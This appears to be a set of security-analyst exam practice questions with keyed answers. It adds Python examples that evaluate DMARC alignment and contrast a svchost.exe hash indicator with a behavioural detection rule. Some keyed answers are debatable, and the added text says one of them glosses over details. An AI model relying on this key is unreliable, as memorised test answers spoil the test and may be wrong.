A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process? A. The most recent audit report B. The incident response playbook C. The incident response plan D. The lessons-learned register

The lessons-learned register

A security analyst reviews the SIEM alert related to a suspicious email and wants to verify the authenticity of the message: SPF=PASS DKIM=FAIL DMARC=FAIL Which of the following did the analyst most likely discover? A. An insider threat altered email security records to mask suspicious DNS resolution traffic B. The message was sent from an authorized mail server but was not signed C. Log normalization corrupted the data as it was brought into the central repository D. The email security software did not process all of the records correctly

The message was sent from an authorized mail server but was not signed
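Added example, not from the page: the DMARC evaluation logic (RFC 7489) in Python over a constructed Authentication-Results header that reproduces the SPF=PASS DKIM=FAIL DMARC=FAIL combination. Two caveats the quiz answer glosses over: DMARC can fail even though SPF passed only when the SPF-authenticated domain (smtp.mailfrom) does not align with the visible From domain, which is typical both of third-party mailers and of spoofing; and dkim=fail strictly means a signature was present but did not verify, whereas an unsigned message produces dkim=none. The organizational-domain helper uses a last-two-labels simplification instead of the Public Suffix List.

```python
import re
from typing import Dict, Optional, Tuple

_AUTHRES = re.compile(
    r"(?P<method>spf|dkim|dmarc)=(?P<result>[a-z]+)"
    r"(?:[^;]*?(?:smtp\.mailfrom|header\.d|header\.from)=(?P<domain>[A-Za-z0-9.-]+))?",
    re.IGNORECASE)


def parse_authentication_results(header: str) -> Dict[str, Tuple[str, Optional[str]]]:
    """Reduce an Authentication-Results header (RFC 8601) to
    {method: (result, identifier domain)}."""
    out: Dict[str, Tuple[str, Optional[str]]] = {}
    for m in _AUTHRES.finditer(header):
        out[m.group("method").lower()] = (m.group("result").lower(), m.group("domain"))
    return out


def org_domain(domain: str) -> str:
    """Organizational domain as 'last two labels'. Simplification: real DMARC
    implementations consult the Public Suffix List (co.uk and friends)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, header_from: str, mode: str = "r") -> bool:
    """RFC 7489 identifier alignment: strict = exact match, relaxed = same org domain."""
    if mode == "s":
        return auth_domain.lower() == header_from.lower()
    return org_domain(auth_domain) == org_domain(header_from)


def evaluate_dmarc(header_from: str, spf: Tuple[str, Optional[str]],
                   dkim: Tuple[str, Optional[str]], aspf: str = "r", adkim: str = "r") -> Dict[str, str]:
    """DMARC passes when at least one authenticated identifier aligns with the
    RFC5322.From domain. Returns the verdict plus the reason an analyst needs."""
    spf_result, spf_domain = spf
    dkim_result, dkim_domain = dkim
    spf_ok = spf_result == "pass" and spf_domain is not None and aligned(spf_domain, header_from, aspf)
    dkim_ok = dkim_result == "pass" and dkim_domain is not None and aligned(dkim_domain, header_from, adkim)
    if spf_ok or dkim_ok:
        return {"dmarc": "pass", "reason": "aligned " + ("SPF" if spf_ok else "DKIM") + " pass"}
    reasons = []
    if spf_result == "pass":
        reasons.append(f"SPF passed for {spf_domain} but it does not align with {header_from}")
    else:
        reasons.append(f"SPF {spf_result}")
    if dkim_result == "none":
        reasons.append("message carries no DKIM signature")
    elif dkim_result == "pass":
        reasons.append(f"DKIM passed for d={dkim_domain} but it does not align with {header_from}")
    else:
        reasons.append(f"DKIM {dkim_result} (a signature was present but did not verify)")
    return {"dmarc": "fail", "reason": "; ".join(reasons)}


def triage(header: str) -> Dict[str, str]:
    """Parse a header and explain its DMARC outcome."""
    res = parse_authentication_results(header)
    header_from = res.get("dmarc", ("none", None))[1]
    if header_from is None:
        return {"dmarc": "unknown", "reason": "no header.from identifier in Authentication-Results"}
    return evaluate_dmarc(header_from, res.get("spf", ("none", None)), res.get("dkim", ("none", None)))


# Constructed header reproducing the SPF=PASS DKIM=FAIL DMARC=FAIL outcome: a
# third-party mailer's bounce domain passes SPF but is not the From domain, and
# the DKIM signature for the From domain does not verify.
SAMPLE_HEADER = ("Authentication-Results: mx.example.net; "
                 "spf=pass smtp.mailfrom=bounce.mailer-example.net; "
                 "dkim=fail header.d=corp-example.com header.s=sel1; "
                 "dmarc=fail header.from=corp-example.com")

if __name__ == "__main__":
    print(triage(SAMPLE_HEADER))
```

The same evaluator shows the flip side: SPF passing for mail.corp-example.com with the From domain corp-example.com aligns under relaxed mode and yields a DMARC pass even with DKIM failing, but fails under strict alignment.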

An analyst is creating the final vulnerability report for one of the company's customers. The customer asks for a scanning profile that reports findings with a CVSS score of 7 or higher. The analyst has confirmed there is no finding for missing database patches, even after false positives have been eliminated by manual checks. Which of the following is the most probable reason for the missing scan result? A. The server was offline at the moment of the scan B. The system was not patched appropriately before the scan C. The scan finding does not match the requirement D. The output of the scan is corrupted

The server was offline at the moment of the scan

Which of the following explains the importance of a timeline when providing an incident response report? A. The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis B. An incident timeline provides the necessary information to understand the actions to mitigate the threat or risk C. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken D. An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timeline

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken

A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the following best describes the result if security teams add this indicator to their detection signatures? A. This indicator would fire on the majority of Windows devices B. Malicious files with a matching hash would be detected C. Security teams would detect rogue svchost.exe processes in their environment D. Security teams would detect event entries detailing execution of known-malicious svchost.exe processes

This indicator would fire on the majority of Windows devices
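Added example, not from the page: Python over constructed process-creation events (shaped like Sysmon Event ID 1 fields; the hash values are placeholders) contrasting the hash indicator from the question with a behavioural rule for svchost.exe. The hash of the genuine binary matches every legitimate svchost.exe on every host and misses a masquerading binary at a different path, while the behavioural rule (expected path, services.exe as parent, a -k service group on the command line) flags both the masquerade and the genuine binary launched from an unexpected parent. Benign exceptions exist on some Windows builds, so the rule is a starting point for tuning, not a finished detection.

```python
import ntpath
from typing import Dict, List

# Constructed process-creation events. Hash values are placeholders for this
# illustration, not real file hashes.
LEGIT_SVCHOST_SHA256 = "11" * 32     # stands in for the hash of the signed Microsoft binary
UNKNOWN_SHA256 = "22" * 32           # stands in for an attacker's renamed binary

SERVICES = r"C:\Windows\System32\services.exe"
SYS32_SVCHOST = r"C:\Windows\System32\svchost.exe"

EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "image": SYS32_SVCHOST, "parent": SERVICES,
     "cmdline": "svchost.exe -k netsvcs -p", "sha256": LEGIT_SVCHOST_SHA256},
    {"host": "WS02", "image": SYS32_SVCHOST, "parent": SERVICES,
     "cmdline": "svchost.exe -k LocalServiceNetworkRestricted -p", "sha256": LEGIT_SVCHOST_SHA256},
    {"host": "SRV01", "image": SYS32_SVCHOST, "parent": SERVICES,
     "cmdline": "svchost.exe -k NetworkService -p", "sha256": LEGIT_SVCHOST_SHA256},
    # Masquerade: different binary, same name, dropped by an installer in a user-writable path.
    {"host": "WS03", "image": r"C:\Users\Public\svchost.exe",
     "parent": r"C:\Users\jsmith\AppData\Local\Temp\setup.exe",
     "cmdline": "svchost.exe", "sha256": UNKNOWN_SHA256},
    # Genuine binary started interactively from a shell: the hash is "legitimate", the behaviour is not.
    {"host": "WS04", "image": SYS32_SVCHOST, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "svchost.exe", "sha256": LEGIT_SVCHOST_SHA256},
]

ALLOWED_SVCHOST_PATHS = {r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe"}


def match_hash_ioc(events: List[Dict[str, str]], sha256: str) -> List[Dict[str, str]]:
    """The indicator from the question: a plain file-hash match."""
    return [e for e in events if e["sha256"].lower() == sha256.lower()]


def suspicious_svchost(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Behavioural rule: an image named svchost.exe that is not at its expected
    path, not spawned by services.exe, or started without a -k service group.
    Each hit carries the reasons so the analyst can triage them."""
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "svchost.exe":
            continue
        reasons = []
        if e["image"].lower() not in ALLOWED_SVCHOST_PATHS:
            reasons.append("unexpected path")
        if ntpath.basename(e["parent"]).lower() != "services.exe":
            reasons.append("parent is not services.exe")
        if "-k" not in e["cmdline"].lower().split():
            reasons.append("no -k service group")
        if reasons:
            hits.append({**e, "reasons": ", ".join(reasons)})
    return hits


if __name__ == "__main__":
    hash_hits = match_hash_ioc(EVENTS, LEGIT_SVCHOST_SHA256)
    print("hash IoC fired on:", [e["host"] for e in hash_hits])
    for h in suspicious_svchost(EVENTS):
        print(f"behavioural hit on {h['host']}: {h['image']} ({h['reasons']})")
```

Against these five events the hash indicator fires on four hosts, three of them entirely benign, and is blind to the one renamed binary; the behavioural rule fires on exactly the two events an analyst would want to look at.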

Based on an internal assessment, a vulnerability management team wants to proactively identify risks to the infrastructure prior to production deployments. Which of the following best supports this approach? A. Threat modeling B. Penetration testing C. Bug Bounty D. SDLC training

Threat modeling

Which of the following will most likely cause severe issues with authentication and logging? A. Virtualization B. Multifactor authentication C. Federation D. Time synchronization

Time synchronization

Which of the following digital forensics activities is considered critical and often includes a graphical representation of process and operating system events? A. Registry editing B. Network mapping C. Timeline analysis D. Write blocking

Timeline analysis

Which of the following is the best reason to implement an MOU? A. To create a business process for configuration management B. To allow internal departments to understand security responsibilities C. To allow an expectation process to be identified for legacy systems D. To ensure that all metrics on service levels are properly reported

To allow internal departments to understand security responsibilities

Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization? A. To establish what information is allowed to be released by designated employees B. To designate an external public relations firm to represent the organization C. To ensure that all news media outlets are informed at the same time D. To define how each employee will be contacted after an event occurs

To establish what information is allowed to be released by designated employees

Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and improvement process? A. To expose flaws in the incident management process related to specific work areas B. To ensure all staff members get exposure to the review process and can provide feedback C. To verify that the organization playbook was properly followed throughout the incident D. To allow cross-training for staff who are not involved in the incident response process

To expose flaws in the incident management process related to specific work areas

